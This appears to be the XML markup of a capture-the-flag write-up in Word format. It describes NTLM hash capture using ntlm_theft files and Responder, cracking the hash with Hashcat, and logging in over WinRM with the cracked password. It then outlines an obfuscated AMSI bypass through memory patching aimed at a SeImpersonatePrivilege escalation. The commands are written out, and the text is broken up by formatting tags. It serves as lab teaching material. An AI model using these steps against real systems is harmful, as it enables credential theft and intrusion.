            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="99"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5943600" cy="3708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5E">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5F">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0">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Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ntlm_theft</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the necessary files were generated to trigger automatic authentication behavior. The following files were uploaded:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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63">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payload.lnk</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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put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payload.scf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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76400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="100" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="16764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Responder was configured to capture </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication attempts directed at the attacker-controlled server. This allowed capture of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM hash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jalem.bipel</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9">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A">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sudo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responder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tun0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-wd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="101"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5943600" cy="1460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6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6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capturing the user’s hash, it was stored in a dedicated file for subsequent </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">brute-force cracking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat</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6F">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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0">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="37474f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat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5600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hash2.txt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~/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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65300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="102"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5943600" cy="1765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81300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="103" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2781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74">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password for user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jalem.bipel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was successfully cracked using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, revealing the plaintext credential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">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7">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jalem.bipel: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babygirl#1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.hw3ezeivm9pu" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kzupfug2f60j" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation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user flag</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With the obtained credentials, access to various services within the environment was tested. Initially, a connection attempt was made via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WinRM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the compromised account. The connection was successfully established, confirming remote access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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7E">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evil-winrm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jalem.bipel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'babygirl#1'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&lt;machine-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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397000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="72" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1397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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.martwd8fn0k7" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation – Obtaining the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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gaining remote access via WinRM, all privileges assigned to the user were enumerated using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">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whoami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/priv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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707799"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="73" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1707799"/>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8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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeImpersonatePrivilege</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was identified as enabled. This privilege allows temporary assumption of another user’s security context, enabling actions to be executed on behalf of another user. From this condition, privilege escalation to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account became possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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However, since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AMSI (Antimalware Scan Interface)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled by default on Windows systems, it was necessary to bypass it before executing additional scripts, as AMSI is responsible for scanning and potentially blocking malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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applying the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AMSI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass code, it became possible to execute potentially malicious scripts without interception by native antimalware mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:spacing w:after="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script developed to perform the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AMSI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass contains the following content:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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8C">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. XOR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscation</w:t>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The script uses XOR encryption (key "evasive")</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to obfuscate critical strings like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amsi.dll</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and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AmsiScanBuffer</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avoiding detection by static analysis and antivirus signatures.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4mxdpthoh31e" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. AMSI Bypass via Memory Patching</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
